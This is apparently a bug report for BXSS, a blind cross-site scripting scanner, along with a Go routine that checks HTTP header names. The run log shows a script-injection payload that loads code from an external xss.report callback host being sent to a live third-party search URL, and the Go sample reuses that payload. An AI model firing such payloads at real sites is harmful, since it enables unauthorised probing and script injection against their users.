Conflict Between -pf and -hf Flags #15
Description
└─$ cat x1.txt | BXSS -pf ~/file/tools/loxs/payloads/bxss.txt -hf ~/hf.txt -l -c 3 -a -f
[BXSS ASCII-art banner]
v0.0.3
[NOTICE] Please Be Patient for bxss
[NOTICE] Checking URL Scheme: https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F
================================================================================
[INFO] Using Header: '"><script src=https://xss.report/c/X></script>
[INFO] Using Trace Mode
[INFO] New Payload:'"><script src=https://xss.report/c/X></script>
[NOTICE] Method: GET
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F
[ERROR] Error making request: Invalid header name (-32602)
[NOTICE] Method: POST
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F
[ERROR] Error making request: Invalid header name (-32602)
[NOTICE] Method: OPTIONS
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F
[ERROR] Error making request: Invalid header name (-32602)
[NOTICE] Method: PUT
[NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F
This tool breaks when I use both the -pf and -hf flags together.
Instead of taking headers from a different file, it replaces the blind XSS payloads in the headers.
[INFO] Using Header: '"><script src=https://xss.report/c/X></script>
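The "Invalid header name" errors in the run above are what happens when a payload string ends up where an HTTP field-name belongs. As an added example (not the project's own code), this Go loader for a -hf style file assumes a "Name: value" per-line format and validates each name as an RFC 7230 token before any request is built, so a misrouted payload is reported once with its line number instead of failing on every request method.

```go
package main

import (
	"fmt"
	"strings"
)

// IsHeaderToken reports whether s is a valid HTTP field-name (an RFC 7230 "token":
// visible ASCII without delimiters). A payload string like '"><script ...> is not one.
func IsHeaderToken(s string) bool {
	if s == "" {
		return false
	}
	for _, c := range s {
		if c <= ' ' || c > '~' || strings.ContainsRune("()<>@,;:\\\"/[]?={}", c) {
			return false
		}
	}
	return true
}

// ParseHeaderLines parses "Name: value" lines (the -hf file format is an assumption here),
// skips blanks and '#' comments, and fails on the first line whose name is not a token,
// reporting the line number so the bad entry can be located in the file.
func ParseHeaderLines(lines []string) (map[string]string, error) {
	hdrs := make(map[string]string)
	for i, ln := range lines {
		ln = strings.TrimSpace(ln)
		if ln == "" || strings.HasPrefix(ln, "#") {
			continue
		}
		name, val, ok := strings.Cut(ln, ":") // first colon only: values may contain URLs
		name = strings.TrimSpace(name)
		if !ok || !IsHeaderToken(name) {
			return nil, fmt.Errorf("line %d: invalid header name %q", i+1, name)
		}
		hdrs[name] = strings.TrimSpace(val)
	}
	return hdrs, nil
}

func main() {
	// Constructed sample input: two valid header lines, then the payload string from the report.
	good := []string{"X-Forwarded-For: 127.0.0.1", "# tracking header", "User-Agent: bxss-probe"}
	bad := []string{`'"><script src=https://xss.report/c/X></script>`}
	h, err := ParseHeaderLines(good)
	fmt.Println(h, err) // map[User-Agent:bxss-probe X-Forwarded-For:127.0.0.1] <nil>
	_, err = ParseHeaderLines(bad)
	fmt.Println(err) // line 1: invalid header name "'\"><script src=https"
}
```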